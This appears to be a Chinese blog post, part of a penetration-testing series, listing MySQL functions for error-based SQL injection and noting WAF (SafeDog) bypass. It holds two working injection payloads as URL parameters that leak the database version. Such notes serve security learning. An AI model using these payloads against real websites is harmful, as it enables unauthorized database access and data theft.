zoukankan      html  css  js  c++  java
  • 别人的渗透测试(三)--SQL显错注入

    续上一章。

    安全狗拦下7成的人,过狗是门学问,偷笑.jpg。很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗。

    说多了,言归正传SQL注入大显错。只适用MYSQL,其它数据库没学呢...

    1、count,rand,floor

    2、updatexml()【最大长度限制32位】

    3、extractvalue()【最大长度限制32位】

    4、geometrycollection()

    5、multipoint()

    6、polygon()

    7、multipolygon()

    8、linestring()

    9、multilinestring()

    10、exp()

    11、NAME_CONST(适用于低版本)

    ?id=3&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
    

    12、Error based Double Query Injection

    id=99+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1
    

    13、以后再添加

    2和3只能返回32位长度,如果想再多返回字符串,请使用分页或者截取字符串。/偷笑

    前十个博客中如下:

    http://www.cnblogs.com/MiWhite/p/6384711.html
    http://www.cnblogs.com/MiWhite/p/6254336.html
    http://www.cnblogs.com/MiWhite/p/6241265.html
    

    SQL注入的方式好多,待老夫慢慢总结,莫着急。

    各位拜拜~下章见。

  • 相关阅读:
    HTML5
    PHP
    eclipse项目导入到android studio
    Jpush教材
    Android性能优化典范
    Fresco好案例
    扫二维码关注微信号,回复“送礼包”就送超值大礼!
    Android开源项目大全之工具库
    android学习“知乎”建议
    C# Json时间类型的转换
  • 原文地址:https://www.cnblogs.com/MiWhite/p/6931075.html
Copyright © 2011-2022 走看看